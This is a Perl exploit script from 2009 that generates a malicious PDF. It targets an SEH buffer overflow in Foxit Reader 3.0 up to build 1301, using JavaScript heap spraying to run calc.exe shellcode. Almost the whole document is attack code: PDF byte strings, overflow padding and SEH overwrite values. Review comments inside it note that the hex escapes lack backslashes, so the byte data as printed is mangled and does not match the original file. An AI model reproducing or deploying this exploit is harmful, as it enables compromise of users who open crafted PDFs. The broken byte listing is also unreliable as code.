# Title : Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Univ.)
# Published : 2009-03-13
# Author : SkD
#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Universal)
# ------------------------------------------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# This vulnerability in the popular Foxit Reader is an SEH
# overflow. The latest build (1506) is not affected, but
# previous builds are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# UPDATE: I have implemented heap spraying via JavaScript to
# make it universal :). The current shellcode executes
# calc.exe.
#
# Exploit written for Windows XP SP3 (should work on other
# versions).
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.
use strict;
use warnings;
# First half of the PDF container: everything that precedes the spliced-in
# padding and SEH values. NOTE(review): as printed here the escapes read
# "x25x50..." with no leading backslash, so Perl treats them as literal
# ASCII characters rather than byte escapes; this copy of the listing does
# not reproduce the original file bytes as-is.
my $pdf_data1 = "x25x50x44x46x2Dx31x2Ex34x0Dx0Ax25xA1xB3xC5xD7x0Dx0Ax31x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx50x61x67x65x2Fx50x61x72x65x6E".
"x74x20x34x20x30x20x52x20x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30".
"x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20".
"x38x34x32x5Dx2Fx47x72x6Fx75x70x3Cx3Cx2Fx53x2Fx54x72x61x6Ex73x70x61".
"x72x65x6Ex63x79x2Fx43x53x2Fx44x65x76x69x63x65x52x47x42x2Fx49x20x74".
"x72x75x65x3Ex3Ex2Fx43x6Fx6Ex74x65x6Ex74x73x20x32x20x30x20x52x20x2F".
"x41x6Ex6Ex6Fx74x73x5Bx20x32x34x20x30x20x52x20x20x32x35x20x30x20x52".
"x20x20x39x20x30x20x52x20x5Dx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32".
"x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x33x20x30x20".
"x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3E".
"x3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx33xD0x33x54x28xE7x2Ax54x30x50x30".
"x00xB2x4Cx2Dx4DxF5x8Cx15x2Cx4Cx0CxF5x2Cx15x8Ax52x15xC2xB5x14xF2xB8".
"x02x15x00x87xEBx07x8Ax0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax33x20x30x20x6Fx62x6Ax0Dx0Ax20x34x32x0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65".
"x2Fx50x61x67x65x73x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30x20x52".
"x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20x38x34".
"x32x5Dx2Fx4Bx69x64x73x5Bx20x31x20x30x20x52x20x5Dx2Fx43x6Fx75x6Ex74".
"x20x31x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax35x20x30x20x6Fx62x6Ax0D".
"x0Ax3Cx3Cx2Fx5Ax69x54x69x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx46x6Fx6Ex74".
"x20x35x20x30x20x52x20x2Fx50x72x6Fx63x53x65x74x5Bx2Fx50x44x46x2Fx54".
"x65x78x74x5Dx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax37x20x30x20x6Fx62".
"x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx43x61x74x61x6Cx6Fx67x2Fx50x61x67".
"x65x73x20x34x20x30x20x52x20x2Fx4Fx70x65x6Ex41x63x74x69x6Fx6Ex5Bx20".
"x31x20x30x20x52x20x2Fx58x59x5Ax20x6Ex75x6Cx6Cx20x6Ex75x6Cx6Cx20x30".
"x5Dx2Fx4Cx61x6Ex67x28x65x6Ex2Dx55x53x29x2Fx4Ex61x6Dx65x73x20x32x38".
"x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax38x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx41x75x74x68x6Fx72x28xFExFFx00x6Dx00x61x00x72".
"x00x63x00x69x00x61x00x6Ex00x6Fx29x2Fx43x72x65x61x74x6Fx72x28xFExFF".
"x00x57x00x72x00x69x00x74x00x65x00x72x29x2Fx50x72x6Fx64x75x63x65x72".
"x28xFExFFx00x4Fx00x70x00x65x00x6Ex00x4Fx00x66x00x66x00x69x00x63x00".
"x65x00x2Ex00x6Fx00x72x00x67x00x20x00x33x00x2Ex00x30x29x2Fx43x72x65".
"x61x74x69x6Fx6Ex44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34".
"x34x35x34x39x2Dx30x32x27x30x30x27x29x2Fx4Dx6Fx64x44x61x74x65x28x44".
"x3Ax32x30x30x39x30x33x31x32x32x32x30x32x34x33x2Dx30x38x27x30x30x27".
"x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax39x20x30x20x6Fx62x6Ax0Dx0A".
"x3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79x70x65x2F".
"x53x63x72x65x65x6Ex2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30".
"x30x39x30x32x31x39x31x34x34x37x35x36x2Dx30x32x27x30x30x27x29x2Fx46".
"x20x34x2Fx52x65x63x74x5Bx20x32x30x35x2Ex31x35x33x20x38x30x36x2Ex31".
"x38x32x20x33x33x35x2Ex32x39x31x20x38x33x33x2Ex34x37x32x5Dx2Fx42x53".
"x3Cx3Cx2Fx53x2Fx53x2Fx57x20x31x3Ex3Ex2Fx42x45x3Cx3Cx2Fx53x2Fx53x3E".
"x3Ex2Fx4Dx4Bx3Cx3Cx2Fx42x43x5Bx20x30x20x30x20x31x5Dx2Fx52x20x30x2F".
"x49x46x3Cx3Cx2Fx53x57x2Fx41x2Fx53x2Fx41x2Fx46x42x20x66x61x6Cx73x65".
"x2Fx41x5Bx20x30x2Ex35x20x30x2Ex35x5Dx3Ex3Ex3Ex3Ex2Fx41x50x3Cx3Cx2F".
"x4Ex20x31x30x20x30x20x52x20x3Ex3Ex2Fx54x28x63x75x61x6Cx71x75x69x65".
"x72x61x29x2Fx41x20x31x32x20x30x20x52x20x2Fx41x41x20x31x37x20x30x20".
"x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x30x20x30x20x6Fx62x6A".
"x0Dx0Ax3Cx3Cx2Fx4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x30".
"x20x30x5Dx2Fx42x42x6Fx78x5Bx20x30x20x30x20x31x33x30x2Ex31x33x39x20".
"x32x37x2Ex32x38x39x37x5Dx2Fx52x65x73x6Fx75x72x63x65x73x3Cx3Cx2Fx45".
"x78x74x47x53x74x61x74x65x3Cx3Cx2Fx49x6Dx61x67x65x4Fx70x61x63x69x74".
"x79x20x31x31x20x30x20x52x20x3Ex3Ex3Ex3Ex2Fx4Cx65x6Ex67x74x68x20x35".
"x34x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3E".
"x73x74x72x65x61x6Dx0Dx0Ax78x9Cx2BxE4x2AxE4x32x50x00xC1xA2x74x30xC3".
"xD0xD8x40xCFxD0xD8x52xC1xC8x5CxCFxC8xC2xD2x5CxA1x28x95xCBx50x01x08".
"x8Dx2Cx20xC2xA6x70xE1x34x2DxAEx40x20x04x00xBDx52x0Dx43x0Dx0Ax65x6E".
"x64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x31x20x30x20".
"x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx45x78x74x47x53x74x61x74x65".
"x2Fx43x41x20x31x2Fx63x61x20x31x2Fx41x49x53x20x66x61x6Cx73x65x3Ex3E".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx52x65x6Ex64x69x74x69".
"x6Fx6Ex2Fx4Fx50x20x34x2Fx41x4Ex20x39x20x30x20x52x20x2Fx52x20x31x33".
"x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x33x20x30x20".
"x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx52x2Fx43x20x31x34x20x30x20x52x20".
"x2Fx4Ex28x63x75x61x6Cx71x75x69x65x72x61x29x3Ex3Ex0Dx0Ax65x6Ex64x6F".
"x62x6Ax0Dx0Ax31x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx43x44".
"x2Fx43x54x28x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx66x75x74x75x72x65".
"x73x70x6Cx61x73x68x29x2Fx50x3Cx3Cx2Fx54x46x28x54x45x4Dx50x41x43x43".
"x45x53x53x29x3Ex3Ex2Fx44x20x31x35x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
"x64x6Fx62x6Ax0Dx0Ax31x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70".
"x65x2Fx46x69x6Cx65x73x70x65x63x2Fx46x28x63x75x61x6Cx71x75x69x65x72".
"x61x29x2Fx46x53x2Fx55x52x4Cx3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
"x36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6F".
"x6Ex2Fx53x2Fx4Cx61x75x6Ex63x68x2Fx46x3Cx3Cx2Fx46x28x2Fx43x2F";
# Second half of the PDF container, appended after the overflow data: the
# remaining objects, then what decodes as the xref table and trailer.
# NOTE(review): same escape mangling as $pdf_data1 — "x29x3E..." is
# literal ASCII text in this copy, not bytes.
my $pdf_data2 = "x29x3Ex3Ex2Fx4Ex65x77x57x69x6Ex64x6Fx77x20x74x72x75x65x3Ex3Ex0Dx0A".
"x65x6Ex64x6Fx62x6Ax0Dx0Ax31x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx50".
"x56x20x31x36x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
"x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46x6Fx6Ex74x2F".
"x53x75x62x74x79x70x65x2Fx54x79x70x65x31x2Fx42x61x73x65x46x6Fx6Ex74".
"x2Fx48x65x6Cx76x65x74x69x63x61x2Fx45x6Ex63x6Fx64x69x6Ex67x2Fx57x69".
"x6Ex41x6Ex73x69x45x6Ex63x6Fx64x69x6Ex67x2Fx46x78x54x61x67x20x31x3E".
"x3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x39x20x30x20x6Fx62x6Ax0Dx0Ax3C".
"x3Cx2Fx4Ex20x32x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0D".
"x0Ax32x30x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x31".
"x36x38x2Fx53x75x62x74x79x70x65x2Fx46x6Fx72x6Dx2Fx42x42x6Fx78x5Bx20".
"x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx52x65x73x6Fx75".
"x72x63x65x73x20x32x31x20x30x20x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6C".
"x61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx95".
"x8DxCDx0Ex82x30x10x84xEFx7Dx8Ax3Dx42xA2xD8x16x88x78x15xE1x66x4CxB4".
"x2Fx50x43xC1x1AxE8x92xA6xFExF4xEDx25x24x28x89x27xF6x30x99x99x6CxBE".
"xD9x0BxB2x39xFAx12x8Dx03xC6x40xD4x84x45x74x3CxA0x7FxC6x36x84xC1x90".
"x81x01xCFxD2xA9xDDxEEx92xC9x8Ax8Ex7Cx9Fx79x12xC5x9Cx51x3Ax40x0Fx24".
"x28x2AxEDx54x05x57x0Fx25xBExB5x83xB3x92x95xB2x21x88xFBx02x24x8BxE7".
"xC8x1Cx7Bx6Fx75x73x73x41x1ExFExC0x17xACxDDx4Bx5Ax05x39x76xBDx34x7E".
"xC5x29x4DxD7x83x64x0BxC7xF8x7CxABx44x0BxC5x53xB6x0FxE9x34x1Ax38x99".
"xD6x47x23xAFx10xE4x03x4Ax14x4Cx32x0Dx0Ax65x6Ex64x73x74x72x65x61x6D".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx46x6Fx6Ex74x20x32x32x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62".
"x6Ax0Dx0Ax32x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx79x46x6Fx6Ex74".
"x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x33".
"x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x65x78x74x4Dx61x74x72x69x78x5B".
"x20x31x20x30x20x30x20x31x20x32x38x35x20x38x31x30x2Ex35x5Dx2Fx4Cx69".
"x63x65x6Ex73x65x28x45x76x61x6Cx75x61x74x69x6Fx6Ex29x2Fx4Dx65x6Ex64".
"x65x72x46x6Cx61x67x28x45x76x61x6Cx75x61x74x69x6Fx6Ex2Cx41x4Ex4Ex4F".
"x54x29x2Fx46x6Fx6Ex74x4Ex61x6Dx65x28x48x65x6Cx76x65x74x69x63x61x29".
"x2Fx46x6Fx6Ex74x53x69x7Ax65x20x31x31x2Fx54x65x78x74x28x45x64x69x74".
"x65x64x20x62x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5Cx72x43x6F".
"x70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20".
"x53x6Fx66x74x77x61x72x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2D".
"x32x30x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4F".
"x6Ex6Cx79x2Ex5Cx72x29x2Fx43x68x61x72x43x6Fx6Cx6Fx72x20x32x35x35x2F".
"x43x68x61x72x53x70x61x63x65x20x30x2Fx4Cx69x6Ex65x46x65x65x64x20x30".
"x2Fx48x6Fx72x7Ax53x63x61x6Cx65x20x31x30x30x2Fx4Fx72x69x67x69x6Ex58".
"x20x32x38x35x2Fx4Fx72x69x67x69x6Ex59x20x38x31x36x2Fx62x43x68x61x6E".
"x67x65x42x6Fx78x20x30x2Fx42x6Fx78x57x69x64x74x68x20x32x35x36x3Ex3E".
"x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3C".
"x2Fx53x75x62x74x79x70x65x2Fx46x72x65x65x54x65x78x74x2Fx52x65x63x74".
"x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx46x20x34".
"x2Fx41x50x20x31x39x20x30x20x52x20x2Fx46x6Fx78x69x74x54x61x67x20x32".
"x33x20x30x20x52x20x2Fx50x20x31x20x30x20x52x20x2Fx50x6Fx70x75x70x20".
"x32x35x20x30x20x52x20x2Fx46x4Ex28x48x65x6Cx76x65x74x69x63x61x29x2F".
"x43x6Fx6Ex74x65x6Ex74x73x28x45x64x69x74x65x64x20x62x79x20x46x6Fx78".
"x69x74x20x52x65x61x64x65x72x5Cx72x43x6Fx70x79x72x69x67x68x74x5Cx28".
"x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72x65x20".
"x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30x30x38x5Cx72x46x6Fx72".
"x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx42".
"x4Bx43x20x36x35x35x33x35x2Fx51x20x30x2Fx44x41x28x2Fx5Ax69x54x69x20".
"x31x31x20x54x66x20x31x20x30x20x30x20x72x67x20x31x20x30x20x30x20x31".
"x20x32x38x35x20x38x31x30x2Ex35x20x54x6Dx20x30x20x54x63x20x31x30x30".
"x20x54x7Ax29x2Fx49x54x2Fx46x72x65x65x54x65x78x74x54x79x70x65x77x72".
"x69x74x65x72x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x35x20x30x20x6F".
"x62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74".
"x79x70x65x2Fx50x6Fx70x75x70x2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44".
"x3Ax32x30x30x39x30x32x31x39x31x34x34x38x31x35x2Dx30x32x27x30x30x27".
"x29x2Fx46x20x32x38x2Fx52x65x63x74x5Bx20x30x20x30x20x30x20x30x5Dx2F".
"x4Fx70x65x6Ex20x66x61x6Cx73x65x2Fx50x61x72x65x6Ex74x20x32x34x20x30".
"x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax33x30x20x30x20x6Fx62".
"x6Ax0Dx0Ax5Bx28x53x6Bx44x53x63x72x69x70x74x29x20x32x36x20x30x20x52".
"x5Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x39x20x30x20x6Fx62x6Ax0Dx0Ax3C".
"x3Cx2Fx4Ex61x6Dx65x73x20x33x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64".
"x6Fx62x6Ax0Dx0Ax32x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Ax61x76x61".
"x53x63x72x69x70x74x20x32x39x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6F".
"x62x6Ax0Dx0Ax32x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74".
"x68x20x37x39x36x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6F".
"x64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx7Dx54x5Dx8FxDAx30x10x7C".
"x47xE2x3Fx44x48x48x20x7Ax95x13xAFx77x13x71x54xAAxFAx33xAAx3Ex24xC1".
"xB9x8BxCAx01x82xE3xAExEDxAFxEFxEExA4x31x5CxBFx78xB0x8CxBDxB3x3Bx3B".
"x3BxCEx4Bx7DxCAx8ExF5xF7xDDxA1xDEx66x9BxECxB2x8FxE7xB6x3ExC6xC5x6C".
"x7Ex71x3Ex36xF3x4Bx6Cx42xA5x6BxE9xC2xFCxD2x75x5Dx89xB5x9Bx5FxA8xA2".
"xEAx76x9Dx65xABxE9x64x86x7DxF9xE7xEDxDBx35xD4x21xD7xBDxE7x7Ax44x79".
"x17x14xE5x73x2AxF4xBCx08x6Ex7ExE1x86x2Cx66x3CxF1xB6x7AxDDxFBx82xF2".
"x54x2Bx1Fx62xBCxC6x87xD2xF6xBEx34x2Cx15x40x95x12x2Cx0Fx5BxDDx2DxB5".
"x23x8AxBDxD7x5Ax12x84x34xDExA3x96x58x06x6Ax45x57xF1xA4x5Dx07x01x36".
"xDExA2x58xCFx29x50x6BxFBx10x0Cx6Bx9Dx86xD2x6Bx5Dx6Ex59x35x11x67x58".
"x11xEAx12x2AxB2xD5x02x56x72x8BxE1x60xB5x18x0Ax48x61xF1x14x8DxA1x67".
"x6Ex52x5Fx31x90xD5x42xC5x41x2BxA6x68xBDx60xDFx09xD8x1Ax4AxF3x27x86".
"xA1x62xB2x5AxD6x51xF0x44xE0x26x7Ax52x9Bx32x81xB8x06xE7xADx9Ex28xE7".
"x54xABx34xADxA4x06x43xB1xBAx01xACx98xA1x0Fx59x1Ex2Ex90xADx0AxE1xDA".
"x97xE9x43xB9xA1x3Cx53x07x65x68xECx2Bx40x43x6Ax03x83x79xEAx4Bx0Ax6E".
"xC1xBCx19x63xBCx40x13x6FxE7x5Cx9Bx92x14xA1x61xB8xAAxC1xADx69xAExE9".
"x1BxB0xB5x98x2Dx32xE4xE6xCCx90xDBxADx27x6Fx8AxD5x44x57x47xB1x7Ax86".
"x3Bx4CxA7xC0x7CxA3x31x14x70x0Ex04x9Fx34x02xA7xF9xD4x57x70xD0x96xA5".
"xC4x4Cx31x6BxD4xA5x41x73xABx45x60xE2x75x8Ex57x35xE0x8AxD6xB4xE5x1C".
"xFEx09xC8x50x9BxABx79x60x1ExCDxF9xEAxC6x9BxBExE0x5Bx91xB4xD2xB0x0E".
"x3Ex84x97x48xE0x9FxFCxEAx43xADx6Ex8Ax35x92x63x9Ax6Cx93x42x2Fx9Dx67".
"x60xE1x0Ax73x38x75xECx93xF2x78x23xAAx89xE5xCCxE1x90x72xE8x51x06xB7".
"xD4xA6xA4xC7x8BxB8xBAx57x7Dx68xAFxB2x42xE4x96xA3x29x13x6AxEBx11xFB".
"x86xD4x5Dx5Cx81x8Fx17x49xA8x60xAFxD5x7BxF3xDBx30x71x7DxDDx62xDAxC2".
"xB1x85x61xB5x3Bx78x95xBBx9BxB7x2Cx70x94xB7x48xE8x5Cx88xE5x19xA6x3C".
"x4Cx13x6Fx56xDCxCDxBCx88xB7x38x1Fx2Ax16xE8xB1x1DxF3x88x13xB8x11x73".
"xD4x87x97xBCx91xDBx6Bx12x32x0Fx6Bx36x53x58xD8xFCxECxC5xCDx96xEBx6C".
"x3Ax79xD1xAFxE2xFEx70xCCx36xB3xD9x7Ax3AxE9x0ExA7x6CxD1x7FxDAx3Fx6F".
"xF2xA2x5CxDBxE6xC3xC6xADxEFxEEx6CxB7x44xDCxEAxEDxA7xB3x72x95xFBxD7".
"xAAx05xA6x93xC7x58x1Fx9BxDDxA1xFDxAAxDFx5CxE0xC7x6FxB0xDEx35xFDxC3".
"x78xF5xF7x9Cx63x86x6Dx3Cx9DxFBx1Fx51xE3x0AxA7x27xE7xE3xA9xFExAEx7F".
"xAEx37xABx54xE6xFDx2ExEEx1Fx9Ex1FxA7x93xD7xC7x7Ex17xB3xC5x58xE3xD7".
"xF9x3DxB0xCBx6Cx3Cx5Ex6DxC6x9Dx75xDFxEFx76x23xA1x84x3Bx5Fx9AxF3xF3".
"xA9xDFx3Fx2CxDCxBBx6Cx40x1BxF5xFFx86xFDx56xF4x2ExC1x40x6Ax71x7BxB7".
"x1Ax9AxB9xCFxDCx37x72xFAx53x6Ax63x6AxF0x1BxD6xC4x4Cx73x3CxC5x27xD3".
"x32xBEx66x1Fx4Fx0Ax5Dx2CxD3xDCx74x54xFDx7DxAEx69xD6xFDx6AxB5xCCx34".
"xF0x73xFFx65xCCxA4xCAx27x91x14xF1x13xE7x6DxDBx93x0Dx0Ax65x6Ex64x73".
"x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x36x20x30x20x6Fx62".
"x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx4Ax61".
"x76x61x53x63x72x69x70x74x2Fx4Ax53x20x32x37x20x30x20x52x20x3Ex3Ex0D".
"x0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax78x72x65x66x0Dx0Ax30x20x33x31x0Dx0Ax30".
"x30x30x30x30x30x30x30x30x30x20x36x35x35x33x36x20x66x0Dx0Ax30x30x30".
"x30x30x30x30x30x31x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x30x31x39x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30".
"x33x31x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x33x33".
"x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x33x32x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x36x38x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x35x32x32x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36x33x33x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax30x30x30x30x30x30x30x38x32x37x20x30x30x30x30x30x20x6Ex0D".
"x0Ax30x30x30x30x30x30x31x30x39x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30".
"x30x30x30x30x30x31x33x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30".
"x30x30x30x31x33x37x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x31x34x34x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31".
"x35x30x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x35x39".
"x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x36x34x39x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x31x37x31x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x32x30x36x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x33x30x36x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax30x30x30x30x30x30x37x33x34x30x20x30x30x30x30x30x20x6Ex0D".
"x0Ax30x30x30x30x30x30x37x36x33x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30".
"x30x30x30x30x30x37x36x37x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30".
"x30x30x30x37x37x31x31x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30".
"x30x38x30x35x33x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38".
"x33x38x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x39x35x31".
"x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x36x34x31x20".
"x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x39x38x20x30x30".
"x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x36x30x20x30x30x30x30".
"x30x20x6Ex0Dx0Ax30x30x30x30x30x30x38x35x32x30x20x30x30x30x30x30x20".
"x6Ex0Dx0Ax74x72x61x69x6Cx65x72x0Dx0Ax3Cx3Cx2Fx52x6Fx6Fx74x20x37x20".
"x30x20x52x20x2Fx49x6Ex66x6Fx20x38x20x30x20x52x20x2Fx49x44x5Bx28xDF".
"xB0x2BxECxF3x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x28xDFxB0x2BxECxF3".
"x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x5Dx2Fx44x6Fx63x43x68x65x63x6B".
"x73x75x6Dx2Fx37x36x33x36x30x32x39x46x42x32x42x32x46x44x32x39x42x43".
"x33x34x41x42x43x33x32x43x46x34x35x42x38x46x2Fx53x69x7Ax65x20x33x31".
"x3Ex3Ex0Dx0Ax73x74x61x72x74x78x72x65x66x0Dx0Ax39x35x37x30x0Dx0Ax25".
"x25x45x4Fx46x0Dx0A";
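# The shellcode is not set in this Perl script; it lives in the PDF's
# embedded JavaScript. The payload wired in there is calc.exe shellcode
# (alpha2).
my $overflow1 = "x41" x 1346;
my $overflow2 = "x41" x 4096;
my $sehjmp    = "SkD";          # ;)
my $sehret    = "x30x30x30x30"; # 0x30303030 - heap sprayed block

# Assemble the output file: leading PDF fragment, padding, the SEH
# overwrite values, more padding, then the trailing PDF fragment.
# Three-argument open with an explicit error check replaces the original
# unchecked two-argument form; the handle is switched to binary mode so no
# newline translation is applied to the written bytes.
my $outfile = 's.pdf';
open my $pdf, '>', $outfile or die "open $outfile: $!";
binmode $pdf;
print {$pdf} $pdf_data1 . $overflow1 . $sehjmp . $sehret . $overflow2 . $pdf_data2
    or die "write $outfile: $!";
# Buffered write errors only surface at close, so check that as well.
close $pdf or die "close $outfile: $!";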